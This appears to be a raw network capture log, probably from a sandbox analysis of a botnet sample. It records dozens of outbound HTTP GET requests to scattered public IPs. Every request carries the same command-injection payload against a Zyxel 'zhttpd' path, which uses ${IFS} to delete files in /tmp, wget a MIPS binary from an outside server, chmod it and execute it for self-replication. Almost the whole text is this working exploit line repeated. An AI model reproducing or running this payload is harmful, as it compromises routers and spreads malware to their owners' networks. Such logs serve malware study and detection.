                                      Jan 19, 2024 17:29:29.713584900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3726192.168.2.1437786186.219.29.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.713622093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3727192.168.2.144640612.124.164.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.713681936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3728192.168.2.1459860167.126.185.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.713737965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3729192.168.2.1440250164.218.40.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.713766098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3730192.168.2.1443092156.121.131.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.713793993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3731192.168.2.145620253.156.125.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.713813066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3732192.168.2.145802897.130.175.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.713854074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3733192.168.2.1451134120.151.233.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.713880062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3734192.168.2.14428284.103.22.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.713912010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3735192.168.2.1453006132.149.111.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.713939905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3736192.168.2.1434004124.192.27.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.713978052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3737192.168.2.1450836163.60.195.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.714050055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3738192.168.2.1449460110.120.210.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.714101076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3739192.168.2.1450246118.95.202.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.714138031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3740192.168.2.1450824202.101.77.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.717159986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3741192.168.2.145992825.163.33.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.717571020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3742192.168.2.1441054111.192.123.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.717602968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3743192.168.2.1433492104.188.36.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.717655897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3744192.168.2.1453784117.67.158.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.717684031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3745192.168.2.143755885.68.74.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.717721939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3746192.168.2.1434944181.177.205.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.717756987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3747192.168.2.143781082.148.53.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.717806101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3748192.168.2.1435310170.105.96.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.717828989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3749192.168.2.1455340145.87.33.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.717873096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3750192.168.2.1434622148.4.218.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.717927933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3751192.168.2.1439736203.15.236.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.723758936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3752192.168.2.145714071.113.200.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.723845005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3753192.168.2.145532067.173.228.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.723862886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3754192.168.2.1454706217.137.90.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.723922014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3755192.168.2.1457954163.238.19.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.723949909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3756192.168.2.143688290.32.32.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.723989010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3757192.168.2.1456110141.234.72.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.724020958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3758192.168.2.1454294122.83.143.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.724080086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3759192.168.2.1458890105.209.185.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.724112988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3760192.168.2.145569431.35.104.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.724153996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3761192.168.2.143601485.125.98.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.724189043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3762192.168.2.1455878154.53.40.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.724231958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3763192.168.2.1439770209.25.151.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.724265099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3764192.168.2.1459888175.113.238.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.724293947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3765192.168.2.1441956126.174.252.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.724317074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3766192.168.2.1448806165.64.42.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.724370003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3767192.168.2.1450032135.40.13.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.724400043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3768192.168.2.1442060190.253.166.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.724426985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3769192.168.2.1454178101.176.182.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.724473953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3770192.168.2.14492668.205.186.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.724526882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3771192.168.2.1443676103.85.76.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.724560022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3772192.168.2.14514101.155.209.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.724591970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3773192.168.2.1436354135.61.57.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.724646091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3774192.168.2.1446414108.87.42.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.724680901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3775192.168.2.1435916181.116.4.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.724725962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3776192.168.2.1440674131.137.58.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.724760056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3777192.168.2.14559744.196.136.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.724791050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3778192.168.2.144242880.215.203.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.724869967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3779192.168.2.145839235.27.211.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.724898100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3780192.168.2.1459512171.27.197.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.724925041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3781192.168.2.1445464175.90.236.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.724972963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3782192.168.2.1459344142.172.18.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.725003958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3783192.168.2.1450268112.4.120.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.725033998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3784192.168.2.144231237.251.36.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.725064039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3785192.168.2.1433936213.234.199.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.725085020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3786192.168.2.1446078113.233.179.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.725101948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3787192.168.2.1453660219.130.86.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.725172997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3788192.168.2.14546145.123.50.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:30.725194931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3789192.168.2.144981246.156.56.152443
                                      TimestampBytes transferredDirectionData
